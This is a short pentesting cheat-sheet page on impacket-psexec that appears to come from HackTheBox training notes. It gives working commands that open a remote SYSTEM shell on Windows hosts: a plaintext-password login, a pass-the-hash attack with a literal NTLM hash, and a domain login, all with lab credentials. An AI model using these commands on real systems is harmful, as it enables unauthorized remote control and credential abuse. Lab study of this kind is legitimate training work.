impacket-psexec

Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host. - hackthebox

# Connect to a local account
impacket-psexec administrator:'Password123!'@10.10.110.17

# Pass the hash attack
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 

User - wley
Pass - transporter@4

Previousimpacket-samrdump Nextimpacket-secretdumps

Last updated 1 year ago